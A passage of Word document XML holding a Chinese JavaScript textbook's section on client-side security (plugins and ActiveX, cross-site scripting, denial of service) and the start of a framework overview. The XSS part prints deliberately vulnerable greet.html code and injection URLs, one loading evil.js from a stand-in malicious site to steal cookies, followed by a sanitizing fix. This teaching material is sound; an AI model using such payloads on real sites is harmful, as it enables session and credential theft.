        <w:t>事件句处理程序函数来处理它）到窗口的文档里。一个文档里的脚本还是不能调用在其他文档里的方法和读取属性，但它们可以用这种消息传递技术来实现安全的通信。参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.3</w:t>
      </w:r>
      <w:r>
        <w:t>节获得更多关于跨文档消息</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的细节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="328" w:name="13_6_3_Jiao_Ben_Hua_Cha_Jian_He_ActiveXK"/>
      <w:r>
        <w:t>13.6.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　脚本化插件和</w:t>
      </w:r>
      <w:r>
        <w:t>ActiveX</w:t>
      </w:r>
      <w:r>
        <w:t>控件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="328"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管核心</w:t>
      </w:r>
      <w:r>
        <w:t>Jav</w:t>
      </w:r>
      <w:r>
        <w:t>aScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言和基本的客户端对象模型缺乏大多数恶意代码所需要的文件系统功能和网络功能，但情况并不像看上去那么简单。在很多</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>亦被用做很多软件或插件的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>脚本引擎</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，这样的组件有</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>ActiveX</w:t>
      </w:r>
      <w:r>
        <w:t>控件和其他浏览器的插件。</w:t>
      </w:r>
      <w:r>
        <w:t>Flash</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>插件是最常安装的例子，它们为客户端脚本提供了非常重要且强大的特性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>ActiveX</w:t>
      </w:r>
      <w:r>
        <w:t>控件和插件的能力也存在着安全性的问题。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>Java applet</w:t>
      </w:r>
      <w:r>
        <w:t>具有访问底层网络的能力。</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>安全</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>沙箱</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>阻止</w:t>
      </w:r>
      <w:r>
        <w:t>applet</w:t>
      </w:r>
      <w:r>
        <w:t>和载入它的服务器之外的</w:t>
      </w:r>
      <w:r>
        <w:t>任何服务器进行通信，因此，这</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>并未打开一个安全漏洞。但是，它暴露了一个根本的问题：如果插件是可以脚本化的，我们不仅要无条件相信</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器的安全架构，还要相信插件的安全架构。实际上，</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Flash</w:t>
      </w:r>
      <w:r>
        <w:t>插件看上去具有健壮的安全性，并且不会为客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>引来安全问题。然而，</w:t>
      </w:r>
      <w:r>
        <w:t>ActiveX</w:t>
      </w:r>
      <w:r>
        <w:t>脚本化有着更加糟糕的历史遗留问题。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器已经能够访问各种各样的脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>ActiveX</w:t>
      </w:r>
      <w:r>
        <w:t>控件，而这些控件是</w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t>操作系统的一部分，并且在过去，操作系统还存在很多可被控件利用的安全漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="329" w:name="13_6_4_Kua_Zhan_Jiao_Ben_"/>
      <w:r>
        <w:t>13.6.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　跨站脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="329"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>跨站脚本（</w:t>
      </w:r>
      <w:r>
        <w:t>Cross-site scripting</w:t>
      </w:r>
      <w:r>
        <w:t>），或者叫做</w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:t>，这个术语用来表示一类安全问题，也就是攻击者向目标</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>站点注入</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签或者脚本。防止</w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:t>攻击是服务器端</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>开发者的一项基本工作。然而，客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序员也必须意识到或者能够预防跨站脚本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面动态地产生文档内容，并且这些文档内容是基于用户提交的数据的，而并没有通过从中移除任何嵌入的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签来</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>消毒</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的话，那么这个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面很容易遭到跨站脚本攻击。来看</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一个小例子，考虑如下的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面，它使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaSc</w:t>
      </w:r>
      <w:r>
        <w:t>ript</w:t>
      </w:r>
      <w:r>
        <w:t>通过用户的名字来向用户问好：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var name=decodeURIComponent(window.location.search.substring(1))||"";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.write("Hello"+name);</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这两行脚本使用</w:t>
      </w:r>
      <w:r>
        <w:t>window.location.search</w:t>
      </w:r>
      <w:r>
        <w:t>来获得它们自己的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中以</w:t>
      </w:r>
      <w:r>
        <w:t>“?”</w:t>
      </w:r>
      <w:r>
        <w:t>开始的部分。它使用</w:t>
      </w:r>
      <w:r>
        <w:t>document.write()</w:t>
      </w:r>
      <w:r>
        <w:t>来向文档添加动态生成的内容。这个页面专门通过如下的一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>来调用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>http://www</w:t>
      </w:r>
      <w:r>
        <w:t>.example.com/greet.html?David</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这么使用的时候，它会显示文本</w:t>
      </w:r>
      <w:r>
        <w:t>"Hello David"</w:t>
      </w:r>
      <w:r>
        <w:t>。但考虑一下，当用下面的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>来调用它，会发生什么情况：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>http://www.example.com/greet.html?%3Cscript%3Ealert('David')%3C/script%3E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>只用这个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，脚本会动态地生成另一个脚本（</w:t>
      </w:r>
      <w:r>
        <w:t>%3C</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>%3E</w:t>
      </w:r>
      <w:r>
        <w:t>是一个尖括号的编码）。在这个例子中，注入的脚本只显示一个对话框，这还是相对较好的情况。但是，如果考虑以下的情况：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>http://siteA/greet.html?name=%3Cscript src=siteB/evil.js%3E%3C/script%3E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>之所以叫做跨站脚本攻击，就是因为它涉及多个站点。站点</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>（或者站点</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>）包含一个专门构造的到站点</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>的链接（就像上面的那个），它会注入一个来自站点</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>的脚本。脚本</w:t>
      </w:r>
      <w:r>
        <w:t>eval.js</w:t>
      </w:r>
      <w:r>
        <w:t>驻留在恶意站点</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>中，但现在，它嵌入到站点</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>中，并且可以对站点</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>的内容进行任何想要的操作。它可能损坏这个页面或者使其不能正常工作（例如，启动下一节所要介绍的拒绝服务攻击）。这可能会对站点</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>的用户带来</w:t>
      </w:r>
      <w:r>
        <w:t>不少坏处。更危险的是，恶意脚本可以读取站点</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>所存储的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>（可能是统计数据或者其他的个人验证信息），然后把数据发送回站点</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>。注入的脚本甚至可以诱骗用户击键并将数据发送回站点</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通常，防止</w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:t>攻击的方式是，在使用任何不可信的数据来动态的创建文档内容之前，从中移除</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签。可以通过添加如下一行代码来移除＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签两边的尖括号，从而修复前面给出的</w:t>
      </w:r>
      <w:r>
        <w:t>greet.html</w:t>
      </w:r>
      <w:r>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>name=name.replace(/</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/g,"</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>lt;").replace(/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>/g,"</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>gt;");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>上面的简</w:t>
      </w:r>
      <w:r>
        <w:t>单代码替换把字符串中所有的尖括号替换成它们对应的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>实体，也就是说将字符串中任意</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签进行转义和过滤删除（</w:t>
      </w:r>
      <w:r>
        <w:t>deactivate</w:t>
      </w:r>
      <w:r>
        <w:t>）处理。</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一个更加微妙的</w:t>
      </w:r>
      <w:r>
        <w:t>toStaticHTML()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，可以移除＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签（和其他潜在的可执行内容）而不修改不可执行的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>toStaticHTML()</w:t>
      </w:r>
      <w:r>
        <w:t>是不标准的，但在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>核心代码中自己实现一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>安全函数也非常简单。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的内容安全策略则更进一步，它为＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>sandbox</w:t>
      </w:r>
      <w:r>
        <w:t>属性。在实现之后，它允许显</w:t>
      </w:r>
      <w:r>
        <w:t>示不可信的内容，并自动禁用脚本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>跨站脚本使得一个有害的漏洞能够立足于</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>的架构之中。深入理解这些跨站脚本的知识是值得的，但是更深入的讨论超出了本书的范围。有很多在线资源可以帮助你预防跨站脚本带来的危险。其中一个最重要的参考资料出自原始</w:t>
      </w:r>
      <w:r>
        <w:t>CERT Advisory</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.cert.org/advisories/CA-2000-02.html</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="330" w:name="13_6_5_Ju_Jue_Fu_Wu_Gong_Ji_"/>
      <w:r>
        <w:t>13.6.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　拒绝服务攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="330"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这里描述的同源策略和其他的安全限制可以很好地预防恶意代码毁坏数据或者防止侵犯隐私这种问题。然而，它们并不能防止另外一种攻击</w:t>
      </w:r>
      <w:r>
        <w:t>：拒绝服务攻击，这种攻击手法非常暴力。如果访问了</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>启用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>功能的一个恶意</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>站点，这个站点可以使用一个</w:t>
      </w:r>
      <w:r>
        <w:t>alert()</w:t>
      </w:r>
      <w:r>
        <w:t>对话框的无限循环占用浏览器，或者用一个无限循环或没有意义的计算来占用</w:t>
      </w:r>
      <w:r>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>某些浏览器可以检测运行时间很长的脚本，并且让用户选择终止它们。但是恶意脚本可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>window.setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>这样的方法来占用</w:t>
      </w:r>
      <w:r>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:t>，并通过分配很多的内存来攻击你的系统。</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器并没有通用的办法来防止这种笨重的攻击手法。实际上，由于没有人会返回一个滥用这种脚本的网站，因此这在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>上不</w:t>
      </w:r>
      <w:r>
        <w:t>是一个常见的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="331" w:name="13_7_Ke_Hu_Duan_Kuang_Jia_"/>
      <w:r>
        <w:t>13.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　客户端框架</w:t>
      </w:r>
      <w:bookmarkEnd w:id="331"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一些</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>开发者发现基于客户端框架或类库来创建它们的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用非常便捷。从某种意义上讲类库也是框架，它们对</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器提供的标准和专用</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>进行了封装，向上提供更高级别的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，用以更高效地进行客户端编程开发。一旦使用一个框架，就要用框架定义的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>来写代码，使用框架的一个明显的好处是高级的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>可以用更简洁的代码完成更复杂的功能。此外，完善的框架也会帮我们处理上文提到的很多兼容性、安全性和可访问性问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t>章会介绍</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>是当前最流行的框架之</w:t>
      </w:r>
      <w:r>
        <w:t>一。如果你决定在你的项目中使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>，还应该阅读第</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t>章的内容；理解底层</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>会帮助你成为更加优秀的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>开发者，即使你很少直接使用它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>以外，还有一些其他的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>框架</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>远超过在这里列出的框架。其中有些开源框架非常有名且广泛使用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Prototype</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Prototype</w:t>
      </w:r>
      <w:r>
        <w:t>类库（</w:t>
      </w:r>
      <w:r>
        <w:t>http://prototypejs.org</w:t>
      </w:r>
      <w:r>
        <w:t>）和</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>类似，是专门针对</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>实现的一套实用工具，此外还为语言核心扩展了很多实用工具，</w:t>
      </w:r>
      <w:r>
        <w:t>Scriptaculous</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>http://scr</w:t>
      </w:r>
      <w:r>
        <w:t>ipt.aculo.us</w:t>
      </w:r>
      <w:r>
        <w:t>）类库是基于</w:t>
      </w:r>
      <w:r>
        <w:t>Prototype</w:t>
      </w:r>
      <w:r>
        <w:t>来实现的，可以用来做动画和各种视觉特效。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Dojo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Dojo</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>http://dojotoolkit.org</w:t>
      </w:r>
      <w:r>
